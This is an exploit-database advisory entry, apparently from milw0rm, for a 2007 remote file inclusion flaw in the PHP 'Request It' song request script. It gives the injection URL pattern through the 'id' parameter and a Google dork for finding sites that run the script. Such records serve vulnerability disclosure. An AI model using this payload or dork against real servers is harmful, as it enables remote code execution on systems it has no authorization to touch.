Request It 1.0b - 'index.php?id' Remote File Inclusion
Author: hackberry
type: webapps
platform: php
port:
date_added: 2007-04-11
date_updated:
verified: 1
codes: OSVDB-34722;CVE-2007-2015
tags:
aliases:
screenshot_url:
application_url:
Request It : Song Request System 1.0b - remote file inclusion
Software: Request It : Song Request System
Type: remote file inclusion
Version: 1.0b
Date: 2007-04-09
Url: http://scripts.ringsworld.com/organizers/requestit/
Risc: middle
------------------------------------
Credit:
http://hackberry.ath.cx
mail[AT]hackberry.ath.cx
------------------------------------
Vulnerability:
http://[target]/?id=[REMOTEFILE]
------------------------------------
Google dork:
"[ Request us to play you a song ]"
# milw0rm.com [2007-04-12]